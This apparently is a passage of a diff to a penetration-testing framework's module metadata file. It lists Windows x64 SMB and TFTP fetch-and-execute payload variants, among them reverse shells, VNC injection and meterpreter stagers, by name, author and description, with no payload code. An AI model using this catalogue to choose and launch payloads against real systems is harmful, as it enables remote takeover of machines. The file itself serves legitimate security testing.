"payload_cmd/windows/smb/x64/vncinject/reverse_tcp": { - "name": "SMB Fetch, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf " - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_rc4": { - "name": "SMB Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "hdm ", - "skape ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_tcp_uuid": { - "name": "SMB Fetch, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_winhttp": { - "name": "SMB Fetch, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/smb/x64/vncinject/reverse_winhttps": { - "name": "SMB Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/smb/x64/vncinject/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Spencer McIntyre", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from an SMB server.\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-02-07 15:59:31 +0000", - "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/smb/x64/vncinject/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/smb/x64", - "adapted_refname": "windows/x64/vncinject/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/vncinject", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_ipv6_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/custom/bind_named_pipe": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "UserExistsError" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_cmd/windows/tftp/x64/custom/bind_tcp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_cmd/windows/tftp/x64/custom/bind_tcp_rc4": { - "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/custom/bind_tcp_uuid": { - "name": "TFTP Fetch, Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/bind_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_http": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_http", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_https": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_https", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_named_pipe": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_named_pipe", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_tcp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_tcp_rc4": { - "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_rc4", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_tcp_uuid": { - "name": "TFTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_tcp_uuid", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_winhttp": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttp", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_cmd/windows/tftp/x64/custom/reverse_winhttps": { - "name": "TFTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/cmd/windows/tftp/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "bwatters-r7", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nCustom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/custom/reverse_winhttps", - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_cmd/windows/tftp/x64/encrypted_shell/reverse_tcp": { - "name": "TFTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/encrypted_shell/reverse_tcp", - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_cmd/windows/tftp/x64/encrypted_shell_reverse_tcp": { - "name": "TFTP Fetch, Windows Encrypted Reverse Shell", - "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Matt Graeber", - "Shelby Pace" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/encrypted_shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/encrypted_shell_reverse_tcp", - "staged": false - }, - "payload_cmd/windows/tftp/x64/exec": { - "name": "TFTP Fetch, Windows x64 Execute Command", - "fullname": "payload/cmd/windows/tftp/x64/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nExecute an arbitrary command (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/exec", - "staged": false - }, - "payload_cmd/windows/tftp/x64/loadlibrary": { - "name": "TFTP Fetch, Windows x64 LoadLibrary Path", - "fullname": "payload/cmd/windows/tftp/x64/loadlibrary", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "scriptjunkie", - "sf " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nLoad an arbitrary x64 library path", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/loadlibrary", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/loadlibrary", - "staged": false - }, - "payload_cmd/windows/tftp/x64/messagebox": { - "name": "TFTP Fetch, Windows MessageBox x64", - "fullname": "payload/cmd/windows/tftp/x64/messagebox", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "pasta " - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a dialog via MessageBox using a customizable title, text & icon", - "references": [], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/messagebox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/messagebox", - "staged": false - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2024-01-03 14:46:15 +0000", - "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", - "is_install_path": true, - "ref_name": "cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/windows/tftp/x64", - "adapted_refname": "windows/x64/meterpreter/bind_ipv6_tcp", - "staged": true, - "stage_refname": "windows/x64/meterpreter", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid": { - "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/cmd/windows/tftp/x64/meterpreter/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "skape ", - "sf ", - "OJ Reeves" - ], - "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - 